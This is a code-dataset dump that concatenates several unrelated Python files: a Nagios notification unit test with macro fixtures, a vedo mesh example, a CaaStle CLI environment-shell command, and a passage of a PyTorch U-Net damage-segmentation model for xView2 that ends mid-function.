    'NAGIOS_TOTALHOSTSERVICES': "39",
    'NAGIOS_TOTALHOSTSERVICESOK': "38",
    'NAGIOS_TOTALHOSTSERVICESWARNING': "0",
    'NAGIOS_TOTALHOSTSERVICESCRITICAL': "1",
    'NAGIOS_TOTALHOSTSERVICESUNKNOWN': "0",
    # Host Group Macros
    'NAGIOS_HOSTGROUPNAME': "a_group",
    'NAGIOS_HOSTGROUPALIAS': "A Group",
    'NAGIOS_HOSTGROUPMEMBERS': "localhost",
    'NAGIOS_HOSTGROUPNOTES': "",
    'NAGIOS_HOSTGROUPNOTESURL': "",
    'NAGIOS_HOSTGROUPACTIONURL': "",
    # Contact Macros
    'NAGIOS_CONTACTNAME': "root",
    'NAGIOS_CONTACTALIAS': "Mr. Big",
    'NAGIOS_CONTACTEMAIL': "root@localhost",
    'NAGIOS_CONTACTPAGER': "pager@localhost",
    'NAGIOS_CONTACTGROUPNAMES': "admins,managers",
    # The address fields could be anything...
    #'NAGIOS_CONTACTADDRESS0': "",
    # Contact Group Macros
    'NAGIOS_CONTACTGROUPNAME': "admins",
    'NAGIOS_CONTACTGROUPALIAS': "Admins",
    'NAGIOS_CONTACTGROUPMEMBERS': "root,luser",
    # Summary Macros (NAGIOS_TOTAL*) are not always available
    # so they are not included here...
    # Notification Macros
    'NAGIOS_NOTIFICATIONTYPE': "PROBLEM",
    'NAGIOS_NOTIFICATIONRECIPIENTS': "root",
    'NAGIOS_NOTIFICATIONISESCALATED': "0",
    'NAGIOS_NOTIFICATIONAUTHOR': "",
    'NAGIOS_NOTIFICATIONAUTHORNAME': "",
    'NAGIOS_NOTIFICATIONAUTHORALIAS': "",
    'NAGIOS_NOTIFICATIONCOMMENT': "",
    'NAGIOS_NOTIFICATIONNUMBER': "1",
    'NAGIOS_HOSTNOTIFICATIONNUMBER': "0",
    'NAGIOS_HOSTNOTIFICATIONID': "0",
    'NAGIOS_SERVICENOTIFICATIONNUMBER': "1",
    'NAGIOS_SERVICENOTIFICATIONID': "409161",
    # Date/Time Macros
    'NAGIOS_LONGDATETIME': "Sun Dec 6 04:25:32 EST 2009",
    'NAGIOS_SHORTDATETIME': "12-06-2009 04:25:33",
    'NAGIOS_DATE': "12-06-2009",
    'NAGIOS_TIME': "04:25:34",
    'NAGIOS_TIMET': "1260091534",
    # File Macros:
    'NAGIOS_MAINCONFIGFILE': "/path/to/nagios.cfg",
    'NAGIOS_STATUSDATAFILE': "/path/to/status.dat",
    'NAGIOS_RETENTIONDATAFILE': "/path/to/retention.dat",
    'NAGIOS_OBJECTCACHEFILE': "/path/to/objects.cache",
    'NAGIOS_TEMPFILE': "/path/to/nagios.tmp",
    'NAGIOS_TEMPPATH': "/tmp",
    'NAGIOS_LOGFILE': "/path/to/nagios.log",
    'NAGIOS_RESOURCEFILE': "/path/to/resource.cfg",
    'NAGIOS_COMMANDFILE': "/path/to/nagios.cmd",
    # Misc Macros:
    'NAGIOS_PROCESSSTARTTIME': "1259966149",
    'NAGIOS_EVENTSTARTTIME': "1259966149",
    'NAGIOS_ADMINEMAIL': "root@localhost",
    'NAGIOS_ADMINPAGER': "pager@localhost",
    # These are available but could be anything...
    #'NAGIOS_ARG0': "",
    #'NAGIOS_USER0': "",
}
# Fixture: service-level NAGIOS_* variables for a service notification;
# merged with ENVIRONMENT_HOST below so it is a superset of the host case.
ENVIRONMENT_SERVICE = {
    # Service Macros
    'NAGIOS_SERVICEDESC': "PING",
    'NAGIOS_SERVICEDISPLAYNAME': "PING",
    'NAGIOS_SERVICESTATE': "CRITICAL",
    'NAGIOS_SERVICESTATEID': "2",
    'NAGIOS_LASTSERVICESTATE': "CRITICAL",
    'NAGIOS_LASTSERVICESTATEID': "2",
    'NAGIOS_SERVICESTATETYPE': "HARD",
    'NAGIOS_SERVICEATTEMPT': "3",
    'NAGIOS_MAXSERVICEATTEMPTS': "3",
    'NAGIOS_SERVICEISVOLATILE': "0",
    'NAGIOS_SERVICEEVENTID': "56460",
    'NAGIOS_LASTSERVICEEVENTID': "56405",
    'NAGIOS_SERVICEPROBLEMID': "28201",
    'NAGIOS_LASTSERVICEPROBLEMID': "0",
    'NAGIOS_SERVICELATENCY': "0.357",
    'NAGIOS_SERVICEEXECUTIONTIME': "0.000",
    'NAGIOS_SERVICEDURATION': "0d 0h 0m 17s",
    'NAGIOS_SERVICEDURATIONSEC': "17",
    'NAGIOS_SERVICEDOWNTIME': "0",
    'NAGIOS_SERVICEPERCENTCHANGE': "12.37",
    # NOTE(review): "z_gorup" looks like a typo for "z_group" (cf. the
    # SERVICEGROUPNAME entry below) — fixture data, left as-is.
    'NAGIOS_SERVICEGROUPNAMES': "z_gorup,y_group",
    'NAGIOS_LASTSERVICECHECK': "1260146052",
    'NAGIOS_LASTSERVICESTATECHANGE': "1260146112",
    'NAGIOS_LASTSERVICEOK': "1260146052",
    'NAGIOS_LASTSERVICEWARNING': "1260091455",
    # NOTE(review): key reads "SERVIVE", not "SERVICE" — left as-is.
    'NAGIOS_LASTSERVIVECRITICAL': "1260146112",
    'NAGIOS_LASTSERVICEUNKNOWN': "1257999616",
    'NAGIOS_SERVICEOUTPUT': "PING CRITICAL - Packet loss = 60%, RTA = 0.38 ms",
    # Literal backslash-n sequences, as Nagios passes multi-line output.
    'NAGIOS_LONGSERVICEOUTPUT': "Long Output\\nWith\\nextra lines",
    'NAGIOS_SERVICEPERFDATA': "",
    'NAGIOS_SERVICECHECKCOMMAND': "check_freshness",
    'NAGIOS_SERVICEACTIONURL': "",
    'NAGIOS_SERVICENOTESURL': "",
    'NAGIOS_SERVICENOTES': "",
    # Service Group Macros
    'NAGIOS_SERVICEGROUPNAME': "z_group",
    'NAGIOS_SERVICEGROUPALIAS': "Z Group",
    'NAGIOS_SERVICEGROUPMEMBERS': "localhost,PING,otherhost,PING",
    'NAGIOS_SERVICEGROUPNOTESURL': "",
    'NAGIOS_SERVICEGROUPNOTES': "",
}
ENVIRONMENT_SERVICE.update(ENVIRONMENT_HOST)
class MacrosTestCase(unittest.TestCase):
    """Checks the notify.Macros wrapper around the NAGIOS_* environment."""
    def setUp(self):
        self.macros = notify.Macros(ENVIRONMENT_SERVICE)
    def testPrefix(self):
        # Macros must strip the NAGIOS_ prefix from every key.
        for key in self.macros:
            self.failIf(key.startswith("NAGIOS_"))
    def testNewlines(self):
        # Only LONGSERVICEOUTPUT may span multiple lines; every other value
        # must be empty or single-line.
        # NOTE(review): iteritems() is Python 2 only (this is a py2-era file).
        for key, value in self.macros.iteritems():
            if key == "LONGSERVICEOUTPUT":
                self.assert_(len(value.splitlines()) > 1)
            else:
                self.assert_(not value or len(value.splitlines()) == 1)
    def testMissing(self):
        # Unknown macro names raise notify.MissingMacro, not a bare KeyError.
        self.assertRaises(notify.MissingMacro,
                          lambda: self.macros['DOESNOTEXIST'])
class NotificationTest(unittest.TestCase):
    """Exercises notify.Notification rendering for host and service alerts."""
    def setUp(self):
        # One macro set per notification type, plus the stock coil config.
        self.macros = {
            'host': notify.Macros(ENVIRONMENT_HOST),
            'service': notify.Macros(ENVIRONMENT_SERVICE)}
        self.config = coil.parse(notify.DEFAULT_CONFIG)
    def testSubject(self):
        # Both notification types must render a non-empty subject line.
        for t in ('host', 'service'):
            obj = notify.Notification(t, self.macros[t], self.config)
            self.assert_(obj.subject())
    def testBody(self):
        for t in ('host', 'service'):
            obj = notify.Notification(t, self.macros[t], self.config)
            # 'long_body'/'short_body': the original locals shadowed the
            # builtin 'long'; renamed.
            long_body = obj.body()
            self.assert_(long_body)
            # Raw strings for the regex: '{\w+}' was a non-raw escape
            # sequence. No unexpanded {MACRO} placeholders may remain.
            self.failIf(re.search(r'{\w+}', long_body))
            obj.format = "short"
            short_body = obj.body()
            self.assert_(short_body)
            self.failIf(re.search(r'{\w+}', short_body))
            # The short format must actually be shorter.
            self.assert_(len(short_body) < len(long_body))
    def testURLs(self):
        # Generated links must be rooted at the configured base URLs.
        config = self.config.copy()
        config['urls.nagios'] = "https://testURLs/zomg/nagios"
        config['urls.graphs'] = "https://testURLs/zomg/graphs"
        for t in ('host', 'service'):
            obj = notify.Notification(t, self.macros[t], config)
            urls = obj.urls()
            self.assert_(urls['nagios'].startswith(config['urls.nagios']))
            self.assert_(urls['graphs'].startswith(config['urls.graphs']))
| 40.31441 | 102 | 0.603986 |
import re
from twisted.trial import unittest
from nagcat import notify
import coil
ENVIRONMENT_HOST = {
'NAGIOS_HOSTNAME': "localhost",
'NAGIOS_HOSTDISPLAYNAME': "localhost",
'NAGIOS_HOSTALIAS': "localhost",
'NAGIOS_HOSTADDRESS': "127.0.0.1",
'NAGIOS_HOSTSTATE': "UP",
'NAGIOS_HOSTSTATEID': "0",
'NAGIOS_LASTHOSTSTATE': "UP",
'NAGIOS_LASTHOSTSTATEID': "0",
'NAGIOS_HOSTSTATETYPE': "HARD",
'NAGIOS_HOSTATTEMPT': "1",
'NAGIOS_MAXHOSTATTEMPTS': "3",
'NAGIOS_HOSTEVENTID': "0",
'NAGIOS_LASTHOSTEVENTID': "0",
'NAGIOS_HOSTPROBLEMID': "0",
'NAGIOS_LASTHOSTPROBLEMID': "0",
'NAGIOS_HOSTLATENCY': "0.123",
'NAGIOS_HOSTEXECUTIONTIME': "4.012",
'NAGIOS_HOSTDURATION': "35d 15h 31m 49s",
'NAGIOS_HOSTDURATIONSEC': "3079909",
'NAGIOS_HOSTDOWNTIME': "0",
'NAGIOS_HOSTPERCENTCHANGE': "0.0",
'NAGIOS_HOSTGROUPNAMES': "a_group,b_group",
'NAGIOS_LASTHOSTCHECK': "1260009929",
'NAGIOS_LASTHOSTSTATECHANGE': "1256929950",
'NAGIOS_LASTHOSTUP': "1260009939",
'NAGIOS_LASTHOSTDOWN': "0",
'NAGIOS_LASTHOSTUNREACHABLE': "0",
'NAGIOS_HOSTOUTPUT': "PING OK - Packet loss = 0%, RTA = 2.00 ms",
'NAGIOS_LONGHOSTOUTPUT': "",
'NAGIOS_HOSTPERFDATA': "rta=10.778000ms;3000.000000;5000.000000;0.000000 pl=0%;80;100;0",
'NAGIOS_HOSTCHECKCOMMAND': "check_host_alive",
'NAGIOS_HOSTACTIONURL': "",
'NAGIOS_HOSTNOTESURL': "",
'NAGIOS_HOSTNOTES': "",
'NAGIOS_TOTALHOSTSERVICES': "39",
'NAGIOS_TOTALHOSTSERVICESOK': "38",
'NAGIOS_TOTALHOSTSERVICESWARNING': "0",
'NAGIOS_TOTALHOSTSERVICESCRITICAL': "1",
'NAGIOS_TOTALHOSTSERVICESUNKNOWN': "0",
'NAGIOS_HOSTGROUPNAME': "a_group",
'NAGIOS_HOSTGROUPALIAS': "A Group",
'NAGIOS_HOSTGROUPMEMBERS': "localhost",
'NAGIOS_HOSTGROUPNOTES': "",
'NAGIOS_HOSTGROUPNOTESURL': "",
'NAGIOS_HOSTGROUPACTIONURL': "",
'NAGIOS_CONTACTNAME': "root",
'NAGIOS_CONTACTALIAS': "Mr. Big",
'NAGIOS_CONTACTEMAIL': "root@localhost",
'NAGIOS_CONTACTPAGER': "pager@localhost",
'NAGIOS_CONTACTGROUPNAMES': "admins,managers",
'NAGIOS_CONTACTGROUPNAME': "admins",
'NAGIOS_CONTACTGROUPALIAS': "Admins",
'NAGIOS_CONTACTGROUPMEMBERS': "root,luser",
'NAGIOS_NOTIFICATIONTYPE': "PROBLEM",
'NAGIOS_NOTIFICATIONRECIPIENTS': "root",
'NAGIOS_NOTIFICATIONISESCALATED': "0",
'NAGIOS_NOTIFICATIONAUTHOR': "",
'NAGIOS_NOTIFICATIONAUTHORNAME': "",
'NAGIOS_NOTIFICATIONAUTHORALIAS': "",
'NAGIOS_NOTIFICATIONCOMMENT': "",
'NAGIOS_NOTIFICATIONNUMBER': "1",
'NAGIOS_HOSTNOTIFICATIONNUMBER': "0",
'NAGIOS_HOSTNOTIFICATIONID': "0",
'NAGIOS_SERVICENOTIFICATIONNUMBER': "1",
'NAGIOS_SERVICENOTIFICATIONID': "409161",
'NAGIOS_LONGDATETIME': "Sun Dec 6 04:25:32 EST 2009",
'NAGIOS_SHORTDATETIME': "12-06-2009 04:25:33",
'NAGIOS_DATE': "12-06-2009",
'NAGIOS_TIME': "04:25:34",
'NAGIOS_TIMET': "1260091534",
'NAGIOS_MAINCONFIGFILE': "/path/to/nagios.cfg",
'NAGIOS_STATUSDATAFILE': "/path/to/status.dat",
'NAGIOS_RETENTIONDATAFILE': "/path/to/retention.dat",
'NAGIOS_OBJECTCACHEFILE': "/path/to/objects.cache",
'NAGIOS_TEMPFILE': "/path/to/nagios.tmp",
'NAGIOS_TEMPPATH': "/tmp",
'NAGIOS_LOGFILE': "/path/to/nagios.log",
'NAGIOS_RESOURCEFILE': "/path/to/resource.cfg",
'NAGIOS_COMMANDFILE': "/path/to/nagios.cmd",
'NAGIOS_PROCESSSTARTTIME': "1259966149",
'NAGIOS_EVENTSTARTTIME': "1259966149",
'NAGIOS_ADMINEMAIL': "root@localhost",
'NAGIOS_ADMINPAGER': "pager@localhost",
}
ENVIRONMENT_SERVICE = {
'NAGIOS_SERVICEDESC': "PING",
'NAGIOS_SERVICEDISPLAYNAME': "PING",
'NAGIOS_SERVICESTATE': "CRITICAL",
'NAGIOS_SERVICESTATEID': "2",
'NAGIOS_LASTSERVICESTATE': "CRITICAL",
'NAGIOS_LASTSERVICESTATEID': "2",
'NAGIOS_SERVICESTATETYPE': "HARD",
'NAGIOS_SERVICEATTEMPT': "3",
'NAGIOS_MAXSERVICEATTEMPTS': "3",
'NAGIOS_SERVICEISVOLATILE': "0",
'NAGIOS_SERVICEEVENTID': "56460",
'NAGIOS_LASTSERVICEEVENTID': "56405",
'NAGIOS_SERVICEPROBLEMID': "28201",
'NAGIOS_LASTSERVICEPROBLEMID': "0",
'NAGIOS_SERVICELATENCY': "0.357",
'NAGIOS_SERVICEEXECUTIONTIME': "0.000",
'NAGIOS_SERVICEDURATION': "0d 0h 0m 17s",
'NAGIOS_SERVICEDURATIONSEC': "17",
'NAGIOS_SERVICEDOWNTIME': "0",
'NAGIOS_SERVICEPERCENTCHANGE': "12.37",
'NAGIOS_SERVICEGROUPNAMES': "z_gorup,y_group",
'NAGIOS_LASTSERVICECHECK': "1260146052",
'NAGIOS_LASTSERVICESTATECHANGE': "1260146112",
'NAGIOS_LASTSERVICEOK': "1260146052",
'NAGIOS_LASTSERVICEWARNING': "1260091455",
'NAGIOS_LASTSERVIVECRITICAL': "1260146112",
'NAGIOS_LASTSERVICEUNKNOWN': "1257999616",
'NAGIOS_SERVICEOUTPUT': "PING CRITICAL - Packet loss = 60%, RTA = 0.38 ms",
'NAGIOS_LONGSERVICEOUTPUT': "Long Output\\nWith\\nextra lines",
'NAGIOS_SERVICEPERFDATA': "",
'NAGIOS_SERVICECHECKCOMMAND': "check_freshness",
'NAGIOS_SERVICEACTIONURL': "",
'NAGIOS_SERVICENOTESURL': "",
'NAGIOS_SERVICENOTES': "",
'NAGIOS_SERVICEGROUPNAME': "z_group",
'NAGIOS_SERVICEGROUPALIAS': "Z Group",
'NAGIOS_SERVICEGROUPMEMBERS': "localhost,PING,otherhost,PING",
'NAGIOS_SERVICEGROUPNOTESURL': "",
'NAGIOS_SERVICEGROUPNOTES': "",
}
ENVIRONMENT_SERVICE.update(ENVIRONMENT_HOST)
class MacrosTestCase(unittest.TestCase):
def setUp(self):
self.macros = notify.Macros(ENVIRONMENT_SERVICE)
def testPrefix(self):
for key in self.macros:
self.failIf(key.startswith("NAGIOS_"))
def testNewlines(self):
for key, value in self.macros.iteritems():
if key == "LONGSERVICEOUTPUT":
self.assert_(len(value.splitlines()) > 1)
else:
self.assert_(not value or len(value.splitlines()) == 1)
def testMissing(self):
self.assertRaises(notify.MissingMacro,
lambda: self.macros['DOESNOTEXIST'])
class NotificationTest(unittest.TestCase):
def setUp(self):
self.macros = {
'host': notify.Macros(ENVIRONMENT_HOST),
'service': notify.Macros(ENVIRONMENT_SERVICE)}
self.config = coil.parse(notify.DEFAULT_CONFIG)
def testSubject(self):
for t in ('host', 'service'):
obj = notify.Notification(t, self.macros[t], self.config)
self.assert_(obj.subject())
def testBody(self):
for t in ('host', 'service'):
obj = notify.Notification(t, self.macros[t], self.config)
long = obj.body()
self.assert_(long)
self.failIf(re.search('{\w+}', long))
obj.format = "short"
short = obj.body()
self.assert_(short)
self.failIf(re.search('{\w+}', short))
self.assert_(len(short) < len(long))
def testURLs(self):
config = self.config.copy()
config['urls.nagios'] ="https://testURLs/zomg/nagios"
config['urls.graphs'] ="https://testURLs/zomg/graphs"
for t in ('host', 'service'):
obj = notify.Notification(t, self.macros[t], config)
urls = obj.urls()
self.assert_(urls['nagios'].startswith(config['urls.nagios']))
self.assert_(urls['graphs'].startswith(config['urls.graphs']))
| true | true |
f72ec7f9188135bc2abd9576d4b4c2d59ae7a487 | 569 | py | Python | examples/basic/buildmesh.py | hadivafaii/vedo | 15f9adbd36d25c0212cbd4eb0c15af54c19f3819 | [
"CC0-1.0"
] | 836 | 2020-06-14T02:38:12.000Z | 2022-03-31T15:39:50.000Z | examples/basic/buildmesh.py | hadivafaii/vedo | 15f9adbd36d25c0212cbd4eb0c15af54c19f3819 | [
"CC0-1.0"
] | 418 | 2020-06-14T10:51:32.000Z | 2022-03-31T23:23:14.000Z | examples/basic/buildmesh.py | hadivafaii/vedo | 15f9adbd36d25c0212cbd4eb0c15af54c19f3819 | [
"CC0-1.0"
] | 136 | 2020-06-14T02:26:41.000Z | 2022-03-31T12:47:18.000Z | """Manually build a mesh from points and faces"""
from vedo import Mesh, printc, show
verts = [(50,50,50), (70,40,50), (50,40,80), (80,70,50)]
faces = [(0,1,2), (2,1,3), (1,0,3)]
# (the first triangle face is formed by vertex 0, 1 and 2)
# Build the polygonal Mesh object:
mesh = Mesh([verts, faces])
mesh.backColor('violet').lineColor('tomato').lineWidth(2)
labs = mesh.labels('id').c('black')
# retrieve them as numpy arrays
printc('points():\n', mesh.points(), c=3)
printc('faces(): \n', mesh.faces(), c=3)
show(mesh, labs, __doc__, viewup='z', axes=1).close()
| 31.611111 | 58 | 0.648506 | from vedo import Mesh, printc, show
verts = [(50,50,50), (70,40,50), (50,40,80), (80,70,50)]
faces = [(0,1,2), (2,1,3), (1,0,3)]
mesh = Mesh([verts, faces])
mesh.backColor('violet').lineColor('tomato').lineWidth(2)
labs = mesh.labels('id').c('black')
printc('points():\n', mesh.points(), c=3)
printc('faces(): \n', mesh.faces(), c=3)
show(mesh, labs, __doc__, viewup='z', axes=1).close()
| true | true |
f72ec8d5be139f6310464dc01e7c0f57e04b86ad | 38 | py | Python | tests/components/statsd/__init__.py | domwillcode/home-assistant | f170c80bea70c939c098b5c88320a1c789858958 | [
"Apache-2.0"
] | 30,023 | 2016-04-13T10:17:53.000Z | 2020-03-02T12:56:31.000Z | tests/components/statsd/__init__.py | jagadeeshvenkatesh/core | 1bd982668449815fee2105478569f8e4b5670add | [
"Apache-2.0"
] | 31,101 | 2020-03-02T13:00:16.000Z | 2022-03-31T23:57:36.000Z | tests/components/statsd/__init__.py | jagadeeshvenkatesh/core | 1bd982668449815fee2105478569f8e4b5670add | [
"Apache-2.0"
] | 11,956 | 2016-04-13T18:42:31.000Z | 2020-03-02T09:32:12.000Z | """Tests for the statsd component."""
| 19 | 37 | 0.684211 | true | true | |
f72eca7ec01c7f98779fd742ed2f63dd47c2895f | 1,623 | py | Python | client/fmcmds/env_shell.py | AlexRogalskiy/caastle | bb832c6828c6e97ac18d58ac0f23d8f61ff7bec3 | [
"Apache-2.0"
] | 19 | 2017-09-01T03:42:00.000Z | 2018-01-25T09:53:59.000Z | client/fmcmds/env_shell.py | mrhm-dev/caastle | bb832c6828c6e97ac18d58ac0f23d8f61ff7bec3 | [
"Apache-2.0"
] | 34 | 2017-08-30T14:11:16.000Z | 2017-12-16T01:52:44.000Z | client/fmcmds/env_shell.py | AlexRogalskiy/caastle | bb832c6828c6e97ac18d58ac0f23d8f61ff7bec3 | [
"Apache-2.0"
] | 4 | 2019-01-20T22:04:59.000Z | 2022-01-09T02:25:35.000Z | import ast
import json
import readline
from cliff.command import Command
import call_server as server
class EnvironmentShell(Command):
    """cliff command: interactive shell that runs commands in a deployed
    environment via the CaaStle server API."""
    def get_parser(self, prog_name):
        parser = super(EnvironmentShell, self).get_parser(prog_name)
        parser.add_argument(dest='env_name',
                            help="Environment name")
        return parser
    def take_action(self, parsed_args):
        env_name = parsed_args.env_name
        # Server returns a JSON string describing the environment, or falsy.
        response = server.TakeAction().get_environment(env_name)
        if response:
            response_json = json.loads(response)
            # env_definition is a Python-literal string; parse it safely.
            env_output_config = ast.literal_eval(response_json['data']['env_definition'])
            # NOTE(review): 'type' shadows the builtin of the same name.
            type = env_output_config['environment']['app_deployment']['type']
            if type == 'local-docker':
                # Local deployments have no remote shell; bail out entirely.
                print("Shell functionality not available for local deployment target.")
                print("You can use docker commands from command-line instead.")
                exit()
            if response_json['data']['status'] == 'available':
                # REPL loop: forward each line to the server until 'exit'.
                # NOTE(review): raw_input is Python 2 only — this client
                # predates py3; would be input() there.
                while True:
                    command_string = raw_input('("exit" to quit, "help" to see commands) cld>')
                    command_string = command_string.strip()
                    if command_string == 'exit':
                        break
                    print("Running the command %s in the environment..." % command_string)
                    response = server.TakeAction().run_command(env_name, command_string)
                    print(response)
            else:
                print("Environment %s is not in appropriate state." % env_name)
| 37.744186 | 95 | 0.59581 | import ast
import json
import readline
from cliff.command import Command
import call_server as server
class EnvironmentShell(Command):
def get_parser(self, prog_name):
parser = super(EnvironmentShell, self).get_parser(prog_name)
parser.add_argument(dest='env_name',
help="Environment name")
return parser
def take_action(self, parsed_args):
env_name = parsed_args.env_name
response = server.TakeAction().get_environment(env_name)
if response:
response_json = json.loads(response)
env_output_config = ast.literal_eval(response_json['data']['env_definition'])
type = env_output_config['environment']['app_deployment']['type']
if type == 'local-docker':
print("Shell functionality not available for local deployment target.")
print("You can use docker commands from command-line instead.")
exit()
if response_json['data']['status'] == 'available':
while True:
command_string = raw_input('("exit" to quit, "help" to see commands) cld>')
command_string = command_string.strip()
if command_string == 'exit':
break
print("Running the command %s in the environment..." % command_string)
response = server.TakeAction().run_command(env_name, command_string)
print(response)
else:
print("Environment %s is not in appropriate state." % env_name)
| true | true |
f72ecb13aa6024c6caa779e5cb7893e409d32f30 | 10,988 | py | Python | xview/models/unetv2.py | mayankj/xView2-Solution | 804aa15a3d9f28c7c1d73e50ce0ed0c359a0493e | [
"MIT"
] | null | null | null | xview/models/unetv2.py | mayankj/xView2-Solution | 804aa15a3d9f28c7c1d73e50ce0ed0c359a0493e | [
"MIT"
] | null | null | null | xview/models/unetv2.py | mayankj/xView2-Solution | 804aa15a3d9f28c7c1d73e50ce0ed0c359a0493e | [
"MIT"
] | null | null | null | from functools import partial
from typing import List, Union, Callable
import torch
from pytorch_toolbelt.modules import ABN, ACT_RELU, ACT_SWISH
from pytorch_toolbelt.modules import encoders as E
from pytorch_toolbelt.modules.decoders import DecoderModule
from pytorch_toolbelt.modules.encoders import EncoderModule
from torch import nn
from torch.nn import functional as F
from .common import disaster_type_classifier, damage_types_classifier
from ..dataset import OUTPUT_MASK_KEY, DISASTER_TYPE_KEY, DISASTER_TYPES, DAMAGE_TYPE_KEY, DAMAGE_TYPES
__all__ = ["UnetV2SegmentationModel"]
class ConvBottleneck(nn.Module):
    """Fuses a decoder feature map with its encoder skip connection.

    The two tensors are concatenated along the channel axis and passed
    through a 3x3 conv + ReLU producing ``out_channels`` channels, so
    ``in_channels`` must equal the sum of both inputs' channel counts.
    """

    def __init__(self, in_channels, out_channels):
        super().__init__()
        # Attribute name 'seq' kept for state_dict compatibility.
        self.seq = nn.Sequential(
            nn.Conv2d(in_channels, out_channels, kernel_size=3, padding=1),
            nn.ReLU(inplace=True),
        )

    def forward(self, dec, enc):
        fused = torch.cat([dec, enc], dim=1)
        return self.seq(fused)
class UnetDecoderBlock(nn.Module):
    """Upsamples a feature map 2x (nearest), then 3x3 conv + ReLU.

    NOTE(review): ``middle_channels`` is accepted but unused; kept only
    for signature compatibility with callers.
    """

    def __init__(self, in_channels, middle_channels, out_channels):
        super().__init__()
        stages = [
            nn.Upsample(scale_factor=2),
            nn.Conv2d(in_channels, out_channels, 3, padding=1),
            nn.ReLU(inplace=True),
        ]
        # Attribute name 'layer' kept for state_dict compatibility.
        self.layer = nn.Sequential(*stages)

    def forward(self, x):
        return self.layer(x)
class UNetDecoderV2(DecoderModule):
    """U-Net decoder: upsampling stages paired with skip-fusion bottlenecks.

    feature_maps lists encoder output channels (shallow -> deep);
    decoder_features lists per-stage decoder channels. The final 1x1 conv
    projects to ``mask_channels``.
    NOTE(review): ``dropout`` and ``abn_block`` are accepted but never used
    in this body.
    """
    def __init__(
        self,
        feature_maps: List[int],
        decoder_features: List[int],
        mask_channels: int,
        last_upsample_filters=None,
        dropout=0.0,
        abn_block=ABN,
    ):
        super().__init__()
        # A scalar decoder_features means "double per stage": f, 2f, 4f, ...
        if not isinstance(decoder_features, list):
            decoder_features = [decoder_features * (2 ** i) for i in range(len(feature_maps))]
        if last_upsample_filters is None:
            last_upsample_filters = decoder_features[0]
        self.encoder_features = feature_maps
        self.decoder_features = decoder_features
        self.decoder_stages = nn.ModuleList([self.get_decoder(idx) for idx in range(0, len(self.decoder_features))])
        # One bottleneck per stage, deepest first: fuses the stage output
        # (f channels) with the next-shallower encoder map.
        self.bottlenecks = nn.ModuleList(
            [
                ConvBottleneck(self.encoder_features[-i - 2] + f, f)
                for i, f in enumerate(reversed(self.decoder_features[:]))
            ]
        )
        self.output_filters = decoder_features
        # Extra 2x upsample back to (near) input resolution before the
        # 1x1 mask projection.
        self.last_upsample = UnetDecoderBlock(decoder_features[0], last_upsample_filters, last_upsample_filters)
        self.final = nn.Conv2d(last_upsample_filters, mask_channels, kernel_size=1)
    def get_decoder(self, layer):
        """Build the decoder stage for index ``layer``.

        The deepest stage reads directly from the encoder's last feature
        map; every other stage reads from the next-deeper decoder stage.
        """
        in_channels = (
            self.encoder_features[layer + 1]
            if layer + 1 == len(self.decoder_features)
            else self.decoder_features[layer + 1]
        )
        return UnetDecoderBlock(in_channels, self.decoder_features[layer], self.decoder_features[max(layer, 0)])
    def forward(self, feature_maps):
        # Start from the deepest encoder feature and walk back up,
        # upsampling and fusing with progressively shallower skips.
        last_dec_out = feature_maps[-1]
        x = last_dec_out
        for idx, bottleneck in enumerate(self.bottlenecks):
            rev_idx = -(idx + 1)
            decoder = self.decoder_stages[rev_idx]
            x = decoder(x)
            x = bottleneck(x, feature_maps[rev_idx - 1])
        x = self.last_upsample(x)
        f = self.final(x)
        return f
class UnetV2SegmentationModel(nn.Module):
    """Siamese U-Net for xView2: a shared encoder runs on the pre- and
    post-disaster images; per-level features are channel-concatenated
    (hence the 2x channel widths) and decoded into a damage mask, with
    optional disaster-type and damage-type classification heads."""
    def __init__(
        self,
        encoder: EncoderModule,
        num_classes: int,
        disaster_type_classes: int,
        damage_type_classes: int,
        unet_channels: List[int],
        dropout=0.25,
        abn_block: Union[ABN, Callable[[int], nn.Module]] = ABN,
        full_size_mask=True,
    ):
        super().__init__()
        self.encoder = encoder
        # Decoder sees pre+post features concatenated -> double the channels.
        feature_maps = [2 * fm for fm in encoder.output_filters]
        self.decoder = UNetDecoderV2(
            feature_maps=feature_maps,
            decoder_features=unet_channels,
            mask_channels=num_classes,
            dropout=dropout,
            abn_block=abn_block,
        )
        self.full_size_mask = full_size_mask
        # Optional auxiliary heads; None disables each output entirely.
        if disaster_type_classes is not None:
            self.disaster_type_classifier = disaster_type_classifier(
                feature_maps[-1], disaster_type_classes, dropout=dropout
            )
        else:
            self.disaster_type_classifier = None
        if damage_type_classes is not None:
            self.damage_types_classifier = damage_types_classifier(
                feature_maps[-1], damage_type_classes, dropout=dropout
            )
        else:
            self.damage_types_classifier = None
    def forward(self, x):
        # x: 6-channel pre/post pair; channels 0-2 = pre, 3-5 = post.
        batch_size = x.size(0)
        pre, post = x[:, 0:3, ...], x[:, 3:6, ...]
        if self.training:
            # Train: one encoder pass over pre and post stacked along the
            # batch dim (shares BatchNorm statistics), then split back and
            # concatenate along channels.
            x = torch.cat([pre, post], dim=0)
            features = self.encoder(x)
            features = [torch.cat([f[0:batch_size], f[batch_size : batch_size * 2]], dim=1) for f in features]
        else:
            # Eval: two separate encoder passes (halves peak batch size).
            pre_features, post_features = self.encoder(pre), self.encoder(post)
            features = [torch.cat([pre, post], dim=1) for pre, post in zip(pre_features, post_features)]
        # Decode mask
        mask = self.decoder(features)
        if self.full_size_mask:
            mask = F.interpolate(mask, size=x.size()[2:], mode="bilinear", align_corners=False)
        output = {OUTPUT_MASK_KEY: mask}
        # Auxiliary heads read the deepest fused feature map.
        if self.disaster_type_classifier is not None:
            disaster_type = self.disaster_type_classifier(features[-1])
            output[DISASTER_TYPE_KEY] = disaster_type
        if self.damage_types_classifier is not None:
            damage_types = self.damage_types_classifier(features[-1])
            output[DAMAGE_TYPE_KEY] = damage_types
        return output
def efficientb3_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """UnetV2SegmentationModel over an EfficientNet-B3 encoder.

    NOTE(review): ``input_channels`` is accepted but never used — the model
    always consumes a 6-channel pre/post pair (split 3+3 in forward).
    """
    encoder = E.EfficientNetB3Encoder(pretrained=pretrained,
                                      layers=[0, 1, 2, 4, 6],
                                      abn_params={"activation": ACT_RELU})
    return UnetV2SegmentationModel(
        encoder,
        num_classes=num_classes,
        # Auxiliary heads are optional; disabled when classifiers=False.
        disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
        damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
        unet_channels=[64, 128, 256, 256],
        dropout=dropout,
